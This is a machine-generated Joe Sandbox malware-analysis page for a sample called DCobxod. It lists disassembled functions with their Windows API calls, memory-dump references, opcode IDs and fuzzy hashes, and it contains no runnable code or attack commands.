                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$FileHandleRead
                                                              • String ID:
                                                              • API String ID: 2244327787-0
                                                              • Opcode ID: 54614173e0344e5ed5c3b0701363fed294c9cb552499b7854e4e9511a220430b
                                                              • Instruction ID: 1dbbd5c9ac40ae1a16a692038da1c1129c8f16dcb62e4fef9c9500dec63eb07d
                                                              • Opcode Fuzzy Hash: 54614173e0344e5ed5c3b0701363fed294c9cb552499b7854e4e9511a220430b
                                                              • Instruction Fuzzy Hash: EF118234920204EBDF206F65D8146EA77A9FF42725F108A3BF426852D0D7789EC4DB6A
                                                              Function 0043AD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,0041D710,00000000,00000000,?,0043ACDB,0041D710,00000000,00000000,00000000,?,0043AED8,00000006,FlsSetValue), ref: 0043AD66
                                                              • GetLastError.KERNEL32(?,0043ACDB,0041D710,00000000,00000000,00000000,?,0043AED8,00000006,FlsSetValue,00447970,FlsSetValue,00000000,00000364,?,004398B7), ref: 0043AD72
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0043ACDB,0041D710,00000000,00000000,00000000,?,0043AED8,00000006,FlsSetValue,00447970,FlsSetValue,00000000), ref: 0043AD80
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad$ErrorLast
                                                              • String ID:
                                                              • API String ID: 3177248105-0
                                                              • Opcode ID: 6083f9a36e2f042f8472b3f471fde114a3125ae2e45aec1cf432556b49c5f531
                                                              • Instruction ID: 6086d29ab71cdc293acb6c112a4f2612c70c80721223636ba85fda769b5b166b
                                                              • Opcode Fuzzy Hash: 6083f9a36e2f042f8472b3f471fde114a3125ae2e45aec1cf432556b49c5f531
                                                              • Instruction Fuzzy Hash: 70014C36281222ABC7218F689C449577B69EF49B73F100731F946D3650C724C811C6EA
                                                              Function 0043BA27 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004397E5: GetLastError.KERNEL32(?,00451030,00434674,00451030,?,?,00433F73,00000050,?,00451030,00000200), ref: 004397E9
                                                                • Part of subcall function 004397E5: _free.LIBCMT ref: 0043981C
                                                                • Part of subcall function 004397E5: SetLastError.KERNEL32(00000000,?,00451030,00000200), ref: 0043985D
                                                                • Part of subcall function 004397E5: _abort.LIBCMT ref: 00439863
                                                                • Part of subcall function 0043BB4E: _abort.LIBCMT ref: 0043BB80
                                                                • Part of subcall function 0043BB4E: _free.LIBCMT ref: 0043BBB4
                                                                • Part of subcall function 0043B7BB: GetOEMCP.KERNEL32(00000000,?,?,0043BA44,?), ref: 0043B7E6
                                                              • _free.LIBCMT ref: 0043BA9F
                                                              • _free.LIBCMT ref: 0043BAD5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorLast_abort
                                                              • String ID: pD
                                                              • API String ID: 2991157371-1597287149
                                                              • Opcode ID: ea7c47eb71083f1a923c6fa41ee7560f3d13b4c11d0f741053a4b0defbef3db5
                                                              • Instruction ID: 4a0187248d98a90188a948cea08d16aa5805b83985efcf64dc397ec1513dd2c9
                                                              • Opcode Fuzzy Hash: ea7c47eb71083f1a923c6fa41ee7560f3d13b4c11d0f741053a4b0defbef3db5
                                                              • Instruction Fuzzy Hash: 7931E731904609AFDB10EFAAC441B5EB7F1EF49324F21509FE6049B3A2EB795D40CB98
                                                              Function 0042E528 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E51F
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: (B$PDGu<B
                                                              • API String ID: 1269201914-2208658473
                                                              • Opcode ID: 6e6d175d176b2359ec4d9d919d3d75118afcf9f5bead9b603c359aa127b59eb4
                                                              • Instruction ID: 7d7baef5279772c0d8fc787fe3fc82edf1dfe671679d4fe884c9c2036d960e60
                                                              • Opcode Fuzzy Hash: 6e6d175d176b2359ec4d9d919d3d75118afcf9f5bead9b603c359aa127b59eb4
                                                              • Instruction Fuzzy Hash: 91B012C13690A07C3144614B3D02D7B050CC0C2F193B1C02FF408C6080F84D0C42143E
                                                              Function 0042E532 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E51F
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: 2B$PDGu<B
                                                              • API String ID: 1269201914-2697500272
                                                              • Opcode ID: ac60d3a3c47db43a48f760a2a57a425892ed3166c8a42ec83102ccce649c821f
                                                              • Instruction ID: 8bc9a655fb06e05fae7d03c3d1164404254e7f35725332bbbcc2f50355419506
                                                              • Opcode Fuzzy Hash: ac60d3a3c47db43a48f760a2a57a425892ed3166c8a42ec83102ccce649c821f
                                                              • Instruction Fuzzy Hash: 0BB012C13690507D3144614B3C02E7B014CD0C2F193B1C02FF408C6080F84C0C41143F
                                                              Function 00419F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetStdHandle.KERNEL32(000000F5,?,?,?,?,0041D343,00000001,?,?,?,00000000,0042551D,?,?,?), ref: 00419F9E
                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,0042551D,?,?,?,?,?,00424FC7,?), ref: 00419FE5
                                                              • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0041D343,00000001,?,?), ref: 0041A011
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: FileWrite$Handle
                                                              • String ID:
                                                              • API String ID: 4209713984-0
                                                              • Opcode ID: b5dfb81fe6a0db10af1606ff3fe6c0229f8de410c013870f78dcd44a80e8817c
                                                              • Instruction ID: 36a4d63fbdf27c85f412071b15a8a4fafb7132e10f814ea414181fc910a57e5a
                                                              • Opcode Fuzzy Hash: b5dfb81fe6a0db10af1606ff3fe6c0229f8de410c013870f78dcd44a80e8817c
                                                              • Instruction Fuzzy Hash: DB31F331204305AFDB14CF20D818BAF7BA5FF85B15F00451EF94597290C779AD89CBAA
                                                              Function 0041A2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0041C27E: _wcslen.LIBCMT ref: 0041C284
                                                              • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0041A175,?,00000001,00000000,?,?), ref: 0041A2D9
                                                              • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0041A175,?,00000001,00000000,?,?), ref: 0041A30C
                                                              • GetLastError.KERNEL32(?,?,?,?,0041A175,?,00000001,00000000,?,?), ref: 0041A329
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectory$ErrorLast_wcslen
                                                              • String ID:
                                                              • API String ID: 2260680371-0
                                                              • Opcode ID: 6d707c314c7a1c89e71160c4551e3d9f062e748ad28d09d489f435ae4ed70425
                                                              • Instruction ID: bb02a8bc1b4346466d09ac665f3bf967904f2bf6ef07646245322309cb09ee99
                                                              • Opcode Fuzzy Hash: 6d707c314c7a1c89e71160c4551e3d9f062e748ad28d09d489f435ae4ed70425
                                                              • Instruction Fuzzy Hash: 7101D6352022145ADF219B764C49BEE23589F0A789F04045BFC01D1281D76CCAD186AE
                                                              Function 0043B893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0043B8B8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: Info
                                                              • String ID:
                                                              • API String ID: 1807457897-3916222277
                                                              • Opcode ID: fddba786ca84e616703d913e2d665f474dfc21607a86818a844104effe346bd9
                                                              • Instruction ID: ce14dcd7ac96f07487cd35e2197b07de808e341496b8f0485166069f598593eb
                                                              • Opcode Fuzzy Hash: fddba786ca84e616703d913e2d665f474dfc21607a86818a844104effe346bd9
                                                              • Instruction Fuzzy Hash: 9A41F9B050424C9ADF218E258C84BE6BBA9EF49304F1414EED69A86242D339AA459FA5
                                                              Function 0043AF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 0043AFDD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: String
                                                              • String ID: LCMapStringEx
                                                              • API String ID: 2568140703-3893581201
                                                              • Opcode ID: d21fc31e25b16bc0d58265997bd340fe0e7222b92c0433d6f0b3fe97afbc347f
                                                              • Instruction ID: 6387766099fe5cb6d20338f41936e758d3bec3a55b7739667effbfc27dad8cac
                                                              • Opcode Fuzzy Hash: d21fc31e25b16bc0d58265997bd340fe0e7222b92c0433d6f0b3fe97afbc347f
                                                              • Instruction Fuzzy Hash: E8012976544109BBDF029F91DC01DEE7F62FF0D754F41415AFE1426160C77A8A31AB89
                                                              Function 0043AF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0043A56F), ref: 0043AF55
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: CountCriticalInitializeSectionSpin
                                                              • String ID: InitializeCriticalSectionEx
                                                              • API String ID: 2593887523-3084827643
                                                              • Opcode ID: 0b1eb33b3bd24e50194e7e4a7583d8fb71af621614b3024f483c65521e0e7517
                                                              • Instruction ID: 9be93c63c4ee895e31f83261af9487720505be77d93ef750a07f958134414252
                                                              • Opcode Fuzzy Hash: 0b1eb33b3bd24e50194e7e4a7583d8fb71af621614b3024f483c65521e0e7517
                                                              • Instruction Fuzzy Hash: 97F0E975685218BFDF019F51DC02DAE7F61EF09B11F50406AFC0856260DB755E219B8E
                                                              Function 0043ADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: Alloc
                                                              • String ID: FlsAlloc
                                                              • API String ID: 2773662609-671089009
                                                              • Opcode ID: 7103808f138190ffd3c6738ccc85b084ff29c3c36381e23363c50c00fd04fe13
                                                              • Instruction ID: e1a50ae15272caca970538dfde5966dcc83c3dcc682222a106153ca79ce665ed
                                                              • Opcode Fuzzy Hash: 7103808f138190ffd3c6738ccc85b084ff29c3c36381e23363c50c00fd04fe13
                                                              • Instruction Fuzzy Hash: DEE055707C82187BE200AF26DC03E6EBB51EB09B22F4000ABFC0093240CE785E1282CE
                                                              Function 0042E1D1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E1E3
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: B
                                                              • API String ID: 1269201914-87422902
                                                              • Opcode ID: 5df9531d45bc6c35d3a2f401a49350ab2214123a8ed72cc27b0a3e7765747638
                                                              • Instruction ID: fffceda8b99c615b86223b1898f877a337dc3ff32a32b04682fca93c45f5318d
                                                              • Opcode Fuzzy Hash: 5df9531d45bc6c35d3a2f401a49350ab2214123a8ed72cc27b0a3e7765747638
                                                              • Instruction Fuzzy Hash: B6B09295359120FC310422472852C3B021CC082B123B0C43FF845C0480A858AC01143A
                                                              Function 0042E1EC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E1E3
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: B
                                                              • API String ID: 1269201914-87422902
                                                              • Opcode ID: 2603daee378259a88ed3a52eb6a8983290c57ac5662bc6d4ed87d5b4ae866857
                                                              • Instruction ID: 91d4b37e5c3a242e393fa78ccdde998382853924587b7592e64185fc9d8d2176
                                                              • Opcode Fuzzy Hash: 2603daee378259a88ed3a52eb6a8983290c57ac5662bc6d4ed87d5b4ae866857
                                                              • Instruction Fuzzy Hash: 5EB09295359120EC3144624B2842D3B021CC081B123B0803FF809C1080A858AC01153A
                                                              Function 0042E1F6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E1E3
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: B
                                                              • API String ID: 1269201914-87422902
                                                              • Opcode ID: 92bc9a48e89cd673b2e307aae3e589d9f64a8bdbf6dce4fc42827d084639d846
                                                              • Instruction ID: 4ba4dbe0cecba4d515234a45fd6af0c925da8e81eab669f6229afdade31c1866
                                                              • Opcode Fuzzy Hash: 92bc9a48e89cd673b2e307aae3e589d9f64a8bdbf6dce4fc42827d084639d846
                                                              • Instruction Fuzzy Hash: 88B09291359020AC314466072802D3A021CC082B123B0C03FF849C1180A858A805143A
                                                              Function 0042E246 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E1E3
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: B
                                                              • API String ID: 1269201914-87422902
                                                              • Opcode ID: 82b598e6d3e28a5d17eb32d45e3f2fcce209e68ae9568b4763c0260a915364e8
                                                              • Instruction ID: 76858981652fcced0561ea5c125396b945fdb0431505eb261254420f00890c82
                                                              • Opcode Fuzzy Hash: 82b598e6d3e28a5d17eb32d45e3f2fcce209e68ae9568b4763c0260a915364e8
                                                              • Instruction Fuzzy Hash: 72B0929135A060AC314462072802D3A021DC082B123B0C03FF889C1080A858A801143A
                                                              Function 0042E250 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E1E3
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
